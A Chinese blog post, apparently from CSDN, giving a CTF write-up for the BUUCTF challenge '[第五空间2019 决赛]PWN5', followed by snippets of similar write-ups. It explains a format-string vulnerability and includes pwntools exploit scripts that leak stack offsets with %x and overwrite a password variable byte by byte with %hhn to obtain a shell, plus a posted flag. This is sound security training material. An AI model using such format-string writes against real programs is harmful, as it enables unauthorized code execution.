[第五空间2019 决赛]PWN5

最新推荐文章于 2025-09-17 22:32:45 发布
原创 最新推荐文章于 2025-09-17 22:32:45 发布 · 552 阅读 · 10 ·
CC 4.0 BY-SA版权
加油加油~
文章标签:

#安全 #CTF #pwn

参考文章:

格式化字符串漏洞原理及其利用(附带pwn例题讲解)_格式化字符串攻击教程-优快云博客

格式化字符串漏洞原理详解_静态编译 格式化'字符串漏洞-优快云博客

BUU pwn [第五空间2019 决赛]PWN5 //格式化字符串漏洞 - Nemuzuki - 博客园 (cnblogs.com)

栈溢出保护(cannary)

数据溢出保护(NX)

运行一下看看

输入对比

看源代码

首先第一步

发现后门

第二步找漏洞

这道题的漏洞是格式化字符串漏洞,详细的可以去看我开头引用的两个博客

我们的思路就是,找到我们数据输入的地方,然后把对比的数据的地址拿到,用我们输入的去给需要对比的数据赋值

我们先来找到我们数据的偏移量

from pwn import *
sh=remote('node5.buuoj.cn',27574)
payload = b'aaaaaaa\n %x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x'
sh.sendline(payload)
sh.sendline(str(0x10101010))
sh.interactive()

大家可以自己数一数,第十个就是我们输入的aaaa

接下来我们来看一下我们对比的数据的地址

可以看见

一共有四个数据段,一个数据段是一个字节

所以我们下面的代码要用 hhn(一个字节表示)

from pwn import *
sh=remote('node5.buuoj.cn',27574)
payload = p32(0x804c047)+p32(0x804c046)+p32(0x804c045)+p32(0x804c044)+b'%11$hhn%10$hhn%13$hhn%12$hhn'
sh.sendline(payload)
sh.sendline(str(0x10101010))
sh.interactive()

因为这个数据段,四个字节,我们每个字节都写入,一个0x803c047,4个字节 ,那么四个地址,16=0x10

然后我一直有几个点没动

看了好久这个exp,终于搞懂了

 三个点:

第一个这个后面的%11 12什么的,顺序随便,因为输入的数一样的,都是0x10

第二个,为什么是0x10101010,因为我们输入的数据要对比也是dword,我们传入0x10,在地址上也就是四个连续的0x10,这样就和

这个数据段对上了

第三个:为什么地址在前面-----这是无符号参数print的写法

地址在前面

最后这个exp就ok了

BUUCTF [第五空间2019 决赛]PWN5 题解
qq_33348179的博客
11-25 597
总共四个 所以分别是:0x0804C044 0x0804C045 0x0804C046 0x0804C047。运行,得到flag:flag{5943efac-d3f0-4660-89b7-a29ab1ee13d1}通过分析得到:程序随机4位数,让我们输入名字和密码 密码和四位数符合就返回 /bin/sh。看到AAAA 对应的16进制 41414141 在第十个%x的位置。同时也能看到read的范围控制在数组范围之内 看来栈溢出不能用了。用这个漏洞覆盖掉存储密码的地址 使其变成确定的数。
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 6815
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
BUUCTF [第五空间2019 决赛]PWN5 wp
最新发布
AEJL叁的博客,欢迎关注!
09-17 903
显示 STACK CANARY 和 NX 开启,说明此题不可用简单直接的栈溢出来解决。(此题仅关注main函数即可,其他调用函数无直接提示)可以发现,main函数中存在指令的调用,向前分析 system 调用条件是输入的,但 dword_804C044 的内容是利用,并不固定,我们无法得知。不过main函数中出现了的调用,这是这一漏洞类型的关键标志:【printf函数的执行​:printf函数依据格式化字符串中的说明符(如%s、%d、%n)​从栈上按顺序获取参数。
BUUCTF-PWN题详解([第五空间2019 决赛]PWN5
2302_80325559的博客
11-28 1815
今天给大家带来的题用到了和之前不相同的方法,用到了格式化字符串。
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1121
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
【BUUCTF】[第五空间2019 决赛]PWN5
2201_75556700的博客
11-29 353
n是将输出的字符的个数写入到内存中,所以最后存在地址中的值是输出字节的数量值,比如AAAA%10$n,输出为4。所以当我们发送密码为'4'时,就使这个式子成立:atoi(nptr) == dword_804C044(4==4)从文件/dev/urandom中读取4个字节的数据到变量dword_804C044中。4、获取偏移地址,偏移地址为10(0x61为a的十六进制)2、下载文件在kali中分析,32位的文件,无壳。3、使用32位的ida分析,查看主函数f5反编译。中的字符串转换为整数。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 953
简单易懂~
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 347
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 2080
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 543
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 3947
[第五空间2019 决赛]PWN5 ——两种解法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

name_name123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值